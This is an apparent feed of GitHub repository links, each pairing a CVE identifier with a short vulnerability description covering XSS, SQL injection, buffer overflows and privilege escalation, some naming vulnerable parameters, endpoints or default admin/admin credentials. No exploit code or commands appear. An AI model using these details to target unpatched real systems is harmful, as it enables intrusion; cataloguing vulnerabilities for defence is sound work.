**The GitHub Security Lab discovered sixteen ways to exploit a cross-site scripting vulnerability in nbconvert. When using nbconvert to generate an HTML version of a user-controllable notebook, it is possible to inject arbitrary HTML which may lead to cross-site scripting (XSS) vulnerabilities if these HTML notebooks are CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-32862](https://github.com/Live-Hack-CVE/CVE-2021-32862) create time: 2022-12-30T04:41:55Z

**Improper input validation for some Intel(R) PROSet/Wireless WiFi and Killer(TM) WiFi products may allow an unauthenticated user to potentially enable denial of service via adjacent access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-44545](https://github.com/Live-Hack-CVE/CVE-2021-44545) create time: 2022-12-30T04:41:13Z

**Improper access control for some Intel(R) PROSet/Wireless WiFi and Killer(TM) WiFi products may allow a privileged user to potentially enable escalation of privilege via local access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-37409](https://github.com/Live-Hack-CVE/CVE-2021-37409) create time: 2022-12-30T04:40:46Z

**A flaw was found in the Red Hat OpenShift API Management product. User input is not validated allowing an authenticated user to inject scripts into some text boxes leading to a XSS attack. The highest threat from this vulnerability is to data confidentiality. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3442](https://github.com/Live-Hack-CVE/CVE-2021-3442) create time: 2022-12-30T04:34:50Z

**Authenticated (admin+) Stored Cross-Site Scripting (XSS) vulnerability in WebbaPlugins Webba Booking plugin <= 4.2.21 at WordPress. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-36847](https://github.com/Live-Hack-CVE/CVE-2021-36847) create time: 2022-12-30T04:34:43Z

**Cross-Site Request Forgery (CSRF) vulnerability in ThimPress WP Hotel Booking plugin <= 1.10.5 at WordPress. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-36852](https://github.com/Live-Hack-CVE/CVE-2021-36852) create time: 2022-12-30T04:34:30Z

**Authenticated (editor+) Stored Cross-Site Scripting (XSS) vulnerability in wpshopmart Testimonial Builder plugin <= 1.6.1 at WordPress. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-36857](https://github.com/Live-Hack-CVE/CVE-2021-36857) create time: 2022-12-30T04:34:26Z

**Insecure Permissions in administration interface in Planex MZK-DP150N 1.42 and 1.43 allows attackers to execute system command as root via etc_ro/web/syscmd.asp. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-37289](https://github.com/Live-Hack-CVE/CVE-2021-37289) create time: 2022-12-30T04:34:06Z

**A flaw was found in keycloak where a brute force attack is possible even when the permanent lockout feature is enabled. This is due to a wrong error message displayed when wrong credentials are entered. The highest threat from this vulnerability is to confidentiality. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3513](https://github.com/Live-Hack-CVE/CVE-2021-3513) create time: 2022-12-30T04:33:55Z

**A NULL pointer dereference flaw was found in the Linux kernel’s IEEE 802.15.4 wireless networking subsystem in the way the user closes the LR-WPAN connection. This flaw allows a local user to crash the system. The highest threat from this vulnerability is to system availability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3659](https://github.com/Live-Hack-CVE/CVE-2021-3659) create time: 2022-12-30T04:33:31Z

**Improper Resource Locking vulnerability in Mitsubishi Electric MELSEC iQ-R Series R12CCPU-V firmware versions "16" and prior, Mitsubishi Electric MELSEC-Q Series Q03UDECPU the first 5 digits of serial No. "24061" and prior, Mitsubishi Electric MELSEC-Q Series Q04/06/10/13/20/26/50/100UDEHCPU the first 5 digits of seria CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-24946](https://github.com/Live-Hack-CVE/CVE-2022-24946) create time: 2022-12-30T04:42:25Z

**Payara through 5.2022.2 allows directory traversal without authentication. This affects Payara Server, Payara Micro, and Payara Server Embedded. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-37422](https://github.com/Live-Hack-CVE/CVE-2022-37422) create time: 2022-12-30T04:41:52Z

**libjpeg commit 281daa9 was discovered to contain an infinite loop via the component Frame::ParseTrailer. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-37768](https://github.com/Live-Hack-CVE/CVE-2022-37768) create time: 2022-12-30T04:41:48Z

**In affected versions of Octopus Deploy it is possible to perform a Regex Denial of Service using the Variable Project Template. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2074](https://github.com/Live-Hack-CVE/CVE-2022-2074) create time: 2022-12-30T04:41:45Z

**In affected versions of Octopus Deploy it is possible to perform a Regex Denial of Service via the package upload function. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2049](https://github.com/Live-Hack-CVE/CVE-2022-2049) create time: 2022-12-30T04:41:41Z

**In affected versions of Octopus Deploy it is possible to perform a Regex Denial of Service targeting the build information request validation. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2075](https://github.com/Live-Hack-CVE/CVE-2022-2075) create time: 2022-12-30T04:41:38Z

**In affected versions of Octopus Deploy it is possible to unmask sensitive variables by using variable preview. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-1901](https://github.com/Live-Hack-CVE/CVE-2022-1901) create time: 2022-12-30T04:41:34Z

**Unsafe Parsing of a PNG tRNS chunk in FastStone Image Viewer through 7.5 results in a stack buffer overflow. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36947](https://github.com/Live-Hack-CVE/CVE-2022-36947) create time: 2022-12-30T04:41:31Z

**The Emerson ControlWave 'Next Generation' RTUs through 2022-05-02 mishandle firmware integrity. They utilize the BSAP-IP protocol to transmit firmware updates. Firmware updates are supplied as CAB archive files containing a binary firmware image. In all cases, firmware images were found to have no authentication (in th CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-30262](https://github.com/Live-Hack-CVE/CVE-2022-30262) create time: 2022-12-30T04:41:27Z

**Tenda AC9 V15.03.2.13 is vulnerable to Buffer Overflow via httpd, form_fast_setting_wifi_set. httpd. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36233](https://github.com/Live-Hack-CVE/CVE-2022-36233) create time: 2022-12-30T04:41:24Z

**libjpeg commit 281daa9 was discovered to contain a segmentation fault via HuffmanDecoder::Get at huffmandecoder.hpp. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-37769](https://github.com/Live-Hack-CVE/CVE-2022-37769) create time: 2022-12-30T04:41:20Z

**Improper access control for some Intel(R) PROSet/Wireless WiFi and Killer(TM) WiFi products may allow a privileged user to potentially enable information disclosure via local access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-21140](https://github.com/Live-Hack-CVE/CVE-2022-21140) create time: 2022-12-30T04:41:16Z

**libjpeg commit 281daa9 was discovered to contain a segmentation fault via LineMerger::GetNextLowpassLine at linemerger.cpp. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-37770](https://github.com/Live-Hack-CVE/CVE-2022-37770) create time: 2022-12-30T04:41:10Z

**Library Management System v1.0 was discovered to contain a SQL injection vulnerability via the bookId parameter at /staff/delete.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36727](https://github.com/Live-Hack-CVE/CVE-2022-36727) create time: 2022-12-30T04:41:06Z

**Library Management System v1.0 was discovered to contain a SQL injection vulnerability via the RollNo parameter at /staff/delstu.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36728](https://github.com/Live-Hack-CVE/CVE-2022-36728) create time: 2022-12-30T04:41:03Z

**Library Management System v1.0 was discovered to contain a SQL injection vulnerability via the M_Id parameter at /librarian/del.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36729](https://github.com/Live-Hack-CVE/CVE-2022-36729) create time: 2022-12-30T04:41:00Z

**jizhicms v2.3.1 has SQL injection in the background. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36578](https://github.com/Live-Hack-CVE/CVE-2022-36578) create time: 2022-12-30T04:40:56Z

**IBM MQ 8.0, (9.0, 9.1, 9.2 LTS), and (9.1 and 9.2 CD) are vulnerable to an XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X-Force ID: 226339. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-22489](https://github.com/Live-Hack-CVE/CVE-2022-22489) create time: 2022-12-30T04:40:53Z

**Insufficiently protected credentials in the installation binaries for Intel(R) SEAPI in all versions may allow an authenticated user to potentially enable escalation of privilege via local access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-26844](https://github.com/Live-Hack-CVE/CVE-2022-26844) create time: 2022-12-30T04:40:49Z

**Softing Secure Integration Server, edgeConnector, and edgeAggregator software ships with the default administrator credentials as `admin` and password as `admin`. This allows Softing to log in to the server directly to perform administrative functions. Upon installation or upon first login, the application does not ask CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2336](https://github.com/Live-Hack-CVE/CVE-2022-2336) create time: 2022-12-30T04:40:42Z

**Multiple reflected XSS vulnerabilities occur when handling error message of BPC SmartVista version 3.28.0 allowing an attacker to execute javascript code at client side. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-35554](https://github.com/Live-Hack-CVE/CVE-2022-35554) create time: 2022-12-30T04:40:39Z

**Insufficiently protected credentials in the Intel(R) Datacenter Group Event iOS application, all versions, may allow an unauthenticated user to potentially enable information disclosure via network access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-30296](https://github.com/Live-Hack-CVE/CVE-2022-30296) create time: 2022-12-30T04:40:32Z

**libjpeg commit 842c7ba was discovered to contain an infinite loop via the component JPEG::ReadInternal. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-35166](https://github.com/Live-Hack-CVE/CVE-2022-35166) create time: 2022-12-30T04:40:10Z

**An issue in AP4_SgpdAtom::AP4_SgpdAtom() of Bento4-1.6.0-639 allows attackers to cause a Denial of Service (DoS) via a crafted mp4 input. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-35165](https://github.com/Live-Hack-CVE/CVE-2022-35165) create time: 2022-12-30T04:40:06Z

**Insufficiently protected credentials in the Intel(R) Team Blue mobile application in all versions may allow an authenticated user to potentially enable information disclosure via local access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-29507](https://github.com/Live-Hack-CVE/CVE-2022-29507) create time: 2022-12-30T04:40:03Z

**A privilege escalation flaw was found in the Ansible Automation Platform. This flaw allows a remote authenticated user with 'change user' permissions to modify the account settings of the superuser account and also remove the superuser privileges. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2568](https://github.com/Live-Hack-CVE/CVE-2022-2568) create time: 2022-12-30T04:39:59Z

**Inadequate encryption strength for some Intel(R) PROSet/Wireless WiFi products may allow an unauthenticated user to potentially enable escalation of privilege via adjacent access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-21139](https://github.com/Live-Hack-CVE/CVE-2022-21139) create time: 2022-12-30T04:39:56Z

**Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Libraries). Supported versions that are affected are Oracle Java SE: 17.0.3.1; Oracle GraalVM Enterprise Edition: 21.3.2 and 22.1.0. Easily exploitable vulnerability allows unauthenticated attacker with network CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-21549](https://github.com/Live-Hack-CVE/CVE-2022-21549) create time: 2022-12-30T04:39:53Z

**Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Hotspot). Supported versions that are affected are Oracle Java SE: 7u343, 8u333, 11.0.15.1, 17.0.3.1, 18.0.1.1; Oracle GraalVM Enterprise Edition: 20.3.6, 21.3.2 and 22.1.0. Difficult to exploit vulnerability al CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-21541](https://github.com/Live-Hack-CVE/CVE-2022-21541) create time: 2022-12-30T04:39:49Z

**Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Hotspot). Supported versions that are affected are Oracle Java SE: 7u343, 8u333, 11.0.15.1, 17.0.3.1, 18.0.1.1; Oracle GraalVM Enterprise Edition: 20.3.6, 21.3.2 and 22.1.0. Easily exploitable vulnerability allo CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-21540](https://github.com/Live-Hack-CVE/CVE-2022-21540) create time: 2022-12-30T04:39:46Z

**Cisco IOS 11.1(x) through 11.3(x) and 12.0(x) through 12.2(x), when configured for BGP routing, allows remote attackers to cause a denial of service (device reload) via malformed BGP (1) OPEN or (2) UPDATE messages. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2004-0589](https://github.com/Live-Hack-CVE/CVE-2004-0589) create time: 2022-12-30T04:00:10Z

**Background For regular, unencrypted FTP traffic, the FTP ALG can inspect the unencrypted control channel and open related sessions for the FTP data channel. These related sessions (gates) are specific to source and destination IPs and ports of client and server. The design intent of the ftps-extensions option (which is CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-5361](https://github.com/Live-Hack-CVE/CVE-2015-5361) create time: 2022-12-30T04:01:18Z

**HTML injection combined with path traversal in the Email service in Gravitee API Management before 1.25.3 allows anonymous users to read arbitrary files via a /management/users/register request. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-25075](https://github.com/Live-Hack-CVE/CVE-2019-25075) create time: 2022-12-30T03:21:01Z

**An out-of-bounds read vulnerability exists in the Obj File TriangleMesh::TriangleMesh() functionality of Slic3r libslic3r 1.3.0 and Master Commit 92abbc42. A specially crafted obj file could lead to information disclosure. An attacker can provide a malicious file to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-28590](https://github.com/Live-Hack-CVE/CVE-2020-28590) create time: 2022-12-30T03:58:03Z

**A heap-based buffer overflow vulnerability exists in the configuration server functionality of the Cosori Smart 5.8-Quart Air Fryer CS158-AF 1.1.0. A specially crafted JSON object can lead to remote code execution. An attacker can send a malicious packet to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-28592](https://github.com/Live-Hack-CVE/CVE-2020-28592) create time: 2022-12-30T03:57:59Z

**An out-of-bounds write vulnerability exists in the Admesh stl_fix_normal_directions() functionality of Prusa Research PrusaSlicer 2.2.0 and Master (commit 4b040b856). A specially crafted AMF file can lead to code execution. An attacker can provide a malicious file to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-28598](https://github.com/Live-Hack-CVE/CVE-2020-28598) create time: 2022-12-30T03:57:56Z

**A buffer overflow vulnerability in FloydSteinbergDitheringC() in contrib/gdevbjca.c of Artifex Software GhostScript v9.50 allows a remote attacker to cause a denial of service via a crafted PDF file. This is fixed in v9.51. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-16297](https://github.com/Live-Hack-CVE/CVE-2020-16297) create time: 2022-12-30T03:57:52Z

**A buffer overflow vulnerability in mj_color_correct() in contrib/japanese/gdevmjc.c of Artifex Software GhostScript v9.50 allows a remote attacker to cause a denial of service via a crafted PDF file. This is fixed in v9.51. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-16298](https://github.com/Live-Hack-CVE/CVE-2020-16298) create time: 2022-12-30T03:57:49Z

**A Division by Zero vulnerability in bj10v_print_page() in contrib/japanese/gdev10v.c of Artifex Software GhostScript v9.50 allows a remote attacker to cause a denial of service via a crafted PDF file. This is fixed in v9.51. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-16299](https://github.com/Live-Hack-CVE/CVE-2020-16299) create time: 2022-12-30T03:57:46Z

**A buffer overflow vulnerability in GetNumWrongData() in contrib/lips4/gdevlips.c of Artifex Software GhostScript v9.50 allows a remote attacker to cause a denial of service via a crafted PDF file. This is fixed in v9.51. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-16296](https://github.com/Live-Hack-CVE/CVE-2020-16296) create time: 2022-12-30T03:57:42Z

**A buffer overflow vulnerability in okiibm_print_page1() in devices/gdevokii.c of Artifex Software GhostScript v9.50 allows a remote attacker to cause a denial of service via a crafted PDF file. This is fixed in v9.51. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-16301](https://github.com/Live-Hack-CVE/CVE-2020-16301) create time: 2022-12-30T03:57:36Z

**A buffer overflow vulnerability in tiff12_print_page() in devices/gdevtfnx.c of Artifex Software GhostScript v9.50 allows a remote attacker to cause a denial of service via a crafted PDF file. This is fixed in v9.51. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-16300](https://github.com/Live-Hack-CVE/CVE-2020-16300) create time: 2022-12-30T03:57:32Z

**A null pointer dereference vulnerability in clj_media_size() in devices/gdevclj.c of Artifex Software GhostScript v9.50 allows a remote attacker to cause a denial of service via a crafted PDF file. This is fixed in v9.51. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-16295](https://github.com/Live-Hack-CVE/CVE-2020-16295) create time: 2022-12-30T03:57:29Z

**A null pointer dereference vulnerability in compose_group_nonknockout_nonblend_isolated_allmask_common() in base/gxblend.c of Artifex Software GhostScript v9.50 allows a remote attacker to cause a denial of service via a crafted PDF file. This is fixed in v9.51. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-16293](https://github.com/Live-Hack-CVE/CVE-2020-16293) create time: 2022-12-30T03:57:24Z

**A buffer overflow vulnerability in epsc_print_page() in devices/gdevepsc.c of Artifex Software GhostScript v9.50 allows a remote attacker to cause a denial of service via a crafted PDF file. This is fixed in v9.51. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-16294](https://github.com/Live-Hack-CVE/CVE-2020-16294) create time: 2022-12-30T03:57:21Z

**A buffer overflow vulnerability in jetp3852_print_page() in devices/gdev3852.c of Artifex Software GhostScript v9.50 allows a remote attacker to cause a denial of service via a crafted PDF file. This is fixed in v9.51. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-16290](https://github.com/Live-Hack-CVE/CVE-2020-16290) create time: 2022-12-30T03:56:55Z

**A buffer overflow vulnerability in mj_raster_cmd() in contrib/japanese/gdevmjc.c of Artifex Software GhostScript v9.50 allows a remote attacker to cause a denial of service via a crafted PDF file. This is fixed in v9.51. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-16292](https://github.com/Live-Hack-CVE/CVE-2020-16292) create time: 2022-12-30T03:56:52Z

**A buffer overflow vulnerability in cif_print_page() in devices/gdevcif.c of Artifex Software GhostScript v9.50 allows a remote attacker to cause a denial of service via a crafted PDF file. This is fixed in v9.51. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-16289](https://github.com/Live-Hack-CVE/CVE-2020-16289) create time: 2022-12-30T03:56:48Z

**A buffer overflow vulnerability in contrib/gdevdj9.c of Artifex Software GhostScript v9.50 allows a remote attacker to cause a denial of service via a crafted PDF file. This is fixed in v9.51. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-16291](https://github.com/Live-Hack-CVE/CVE-2020-16291) create time: 2022-12-30T03:56:45Z

**A buffer overflow vulnerability in pj_common_print_page() in devices/gdevpjet.c of Artifex Software GhostScript v9.50 allows a remote attacker to cause a denial of service via a crafted PDF file. This is fixed in v9.51. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-16288](https://github.com/Live-Hack-CVE/CVE-2020-16288) create time: 2022-12-30T03:56:41Z

**A buffer overflow vulnerability in lprn_is_black() in contrib/lips4/gdevlprn.c of Artifex Software GhostScript v9.50 allows a remote attacker to cause a denial of service via a crafted PDF file. This is fixed in v9.51. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-16287](https://github.com/Live-Hack-CVE/CVE-2020-16287) create time: 2022-12-30T03:56:38Z

**A flaw was found in cluster-ingress-operator. A change to how the router-default service allows only certain IP source ranges could allow an attacker to access resources that would otherwise be restricted to specified IP ranges. The highest threat from this vulnerability is to data confidentiality and integrity as well CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-27836](https://github.com/Live-Hack-CVE/CVE-2020-27836) create time: 2022-12-30T03:56:35Z

**An exploitable SQL injection vulnerability exists in "global_lists/choices" page of the Rukovoditel Project Management App 2.7.2. A specially crafted HTTP request can lead to SQL injection. An attacker can make an authenticated HTTP request to trigger this vulnerability, this can be done either with administrator crede CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-13592](https://github.com/Live-Hack-CVE/CVE-2020-13592) create time: 2022-12-30T03:55:41Z

**Fiserv Prologue through 2020-12-16 does not properly protect the database password. If an attacker were to gain access to the configuration file (specifically, the LogPassword attribute within appconfig.ini), they would be able to decrypt the password stored within the configuration file. This would yield cleartext cre CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-35992](https://github.com/Live-Hack-CVE/CVE-2020-35992) create time: 2022-12-30T03:20:26Z

**This vulnerability is caused by the lack of validation of input values for specific functions if WISA Smart Wing CMS. Remote attackers can use this vulnerability to leak all files in the server without logging in system. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-26639](https://github.com/Live-Hack-CVE/CVE-2021-26639) create time: 2022-12-30T04:01:32Z

**The Transposh WordPress Translation WordPress plugin before 1.0.8 does not sanitise and escape the a parameter via an AJAX action (available to both unauthenticated and authenticated users when the curl library is installed) before outputting it back in the response, leading to a Reflected Cross-Site Scripting issue CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-24910](https://github.com/Live-Hack-CVE/CVE-2021-24910) create time: 2022-12-30T04:00:07Z

**Out of bounds read in firmware for some Intel(R) Wireless Bluetooth(R) and Killer(TM) Bluetooth(R) products before version 22.120 may allow a privileged user to potentially enable information disclosure via local access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-23179](https://github.com/Live-Hack-CVE/CVE-2021-23179) create time: 2022-12-30T03:59:39Z

**Improper buffer restrictions in firmware for some Intel(R) Wireless Bluetooth(R) and Killer(TM) Bluetooth(R) products before version 22.120 may allow an authenticated user to potentially enable denial of service via local access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-26257](https://github.com/Live-Hack-CVE/CVE-2021-26257) create time: 2022-12-30T03:59:36Z

**Improper access control in the firmware for some Intel(R) E810 Ethernet Controllers before version 1.6.0.6 may allow a privileged user to potentially enable denial of service via local access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-33128](https://github.com/Live-Hack-CVE/CVE-2021-33128) create time: 2022-12-30T03:57:39Z

**A stack-based buffer overflow vulnerability exists in the PDF process_fontname functionality of Accusoft ImageGear 19.9. A specially crafted malformed file can lead to code execution. An attacker can provide a malicious file to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-21821](https://github.com/Live-Hack-CVE/CVE-2021-21821) create time: 2022-12-30T03:56:30Z

**A privilege escalation vulnerability exists in the Windows version of installation for Advantech R-SeeNet Advantech R-SeeNet 2.4.15 (30.07.2021). A specially-crafted file can be replaced in the system to escalate privileges to NT SYSTEM authority. An attacker can provide a malicious file to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-21911](https://github.com/Live-Hack-CVE/CVE-2021-21911) create time: 2022-12-30T03:56:27Z

**An integer overflow vulnerability exists in the DICOM parse_dicom_meta_info functionality of Accusoft ImageGear 19.9. A specially crafted malformed file can lead to a stack-based buffer overflow. An attacker can provide a malicious file to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-21807](https://github.com/Live-Hack-CVE/CVE-2021-21807) create time: 2022-12-30T03:56:24Z

**A command execution vulnerability exists in the default legacy spellchecker plugin in Moodle 3.10. A specially crafted series of HTTP requests can lead to command execution. An attacker must have administrator privileges to exploit this vulnerabilities. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-21809](https://github.com/Live-Hack-CVE/CVE-2021-21809) create time: 2022-12-30T03:56:21Z

**A use-after-free vulnerability exists in the way certain events are processed for ImageLoader objects of Webkit WebKitGTK 2.30.4. A specially crafted web page can lead to a potential information leak and further memory corruption. In order to trigger the vulnerability, a victim must be tricked into visiting a malicious CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-21775](https://github.com/Live-Hack-CVE/CVE-2021-21775) create time: 2022-12-30T03:56:17Z

**An information disclosure vulnerability exists in the Ethernet/IP UDP handler functionality of EIP Stack Group OpENer 2.3 and development commit 8c73bf3. A specially crafted network request can lead to an out-of-bounds read. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-21777](https://github.com/Live-Hack-CVE/CVE-2021-21777) create time: 2022-12-30T03:55:57Z

**An improper array index validation vulnerability exists in the TIF IP_planar_raster_unpack functionality of Accusoft ImageGear 19.9. A specially crafted malformed file can lead to an out-of-bounds write. An attacker can provide a malicious file to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-21833](https://github.com/Live-Hack-CVE/CVE-2021-21833) create time: 2022-12-30T03:55:53Z

**An out-of-bounds write vulnerability exists in the JPG Handle_JPEG420 functionality of Accusoft ImageGear 19.9. A specially crafted malformed file can lead to memory corruption. An attacker can provide a malicious file to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-21824](https://github.com/Live-Hack-CVE/CVE-2021-21824) create time: 2022-12-30T03:55:50Z

**An improper caller check vulnerability in Managed Provisioning prior to SMR APR-2021 Release 1 allows unprivileged application to install arbitrary application, grant device admin permission and then delete several installed application. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-25356](https://github.com/Live-Hack-CVE/CVE-2021-25356) create time: 2022-12-30T03:55:47Z

**The Transposh WordPress Translation WordPress plugin before 1.0.8 does not sanitise and escape the tk0 parameter from the tp_translation AJAX action, leading to Stored Cross-Site Scripting, which will trigger in the admin dashboard of the plugin. The minimum role needed to perform such attack depends on the plugin "Who CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-24911](https://github.com/Live-Hack-CVE/CVE-2021-24911) create time: 2022-12-30T03:55:11Z

**The Transposh WordPress Translation WordPress plugin before 1.0.8 does not have CSRF check in its tp_translation AJAX action, which could allow attackers to make authorised users add a translation. Given the lack of sanitisation in the tk0 parameter, this could lead to a Stored Cross-Site Scripting issue which will be CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-24912](https://github.com/Live-Hack-CVE/CVE-2021-24912) create time: 2022-12-30T03:55:07Z

**A flaw was found in Qt. An out-of-bounds read vulnerability was found in QRadialFetchSimd in qt/qtbase/src/gui/painting/qdrawhelper_p.h in Qt/Qtbase. While rendering and displaying a crafted Scalable Vector Graphics (SVG) file this flaw may lead to an unauthorized memory access. The highest threat from this vulnerabili CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3481](https://github.com/Live-Hack-CVE/CVE-2021-3481) create time: 2022-12-30T03:55:04Z

**The WAN configuration page "wan.htm" on D-Link DIR-615 devices with firmware 20.06 can be accessed directly without authentication which can lead to disclose the information about WAN settings and also leverage attacker to modify the data fields of page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-42627](https://github.com/Live-Hack-CVE/CVE-2021-42627) create time: 2022-12-30T03:54:50Z

**A flaw was found in the Linux kernel. A memory leak problem was found in mbochs_ioctl in samples/vfio-mdev/mbochs.c in Virtual Function I/O (VFIO) Mediated devices. This flaw could allow a local attacker to leak internal kernel information. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3736](https://github.com/Live-Hack-CVE/CVE-2021-3736) create time: 2022-12-30T03:54:43Z

**A memory leak flaw was found in the Linux kernel's ccp_run_aes_gcm_cmd() function that allows an attacker to cause a denial of service. The vulnerability is similar to the older CVE-2019-18808. The highest threat from this vulnerability is to system availability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3764](https://github.com/Live-Hack-CVE/CVE-2021-3764) create time: 2022-12-30T03:54:40Z

**In PVRSRVBridgeHeapCfgHeapConfigName, there is a possible leak of kernel heap content due to uninitialized data. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android SoCAndroid ID: A-236848817 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-0887](https://github.com/Live-Hack-CVE/CVE-2021-0887) create time: 2022-12-30T03:52:06Z

**In PVRSRVBridgeHeapCfgHeapDetails, there is a possible leak of kernel heap content due to uninitialized data. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android SoCAndroid ID: A-236848165 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-0698](https://github.com/Live-Hack-CVE/CVE-2021-0698) create time: 2022-12-30T03:51:53Z

**IBM OPENBMC OP910 and OP940 could allow a privileged user to upload an improper site identity certificate that may cause it to lose network services. IBM X-Force ID: 207221. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-29891](https://github.com/Live-Hack-CVE/CVE-2021-29891) create time: 2022-12-30T03:21:34Z

**The TechRadar app 1.1 for Confluence Server allows XSS via the Title field of a Radar. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-37412](https://github.com/Live-Hack-CVE/CVE-2021-37412) create time: 2022-12-30T03:21:04Z

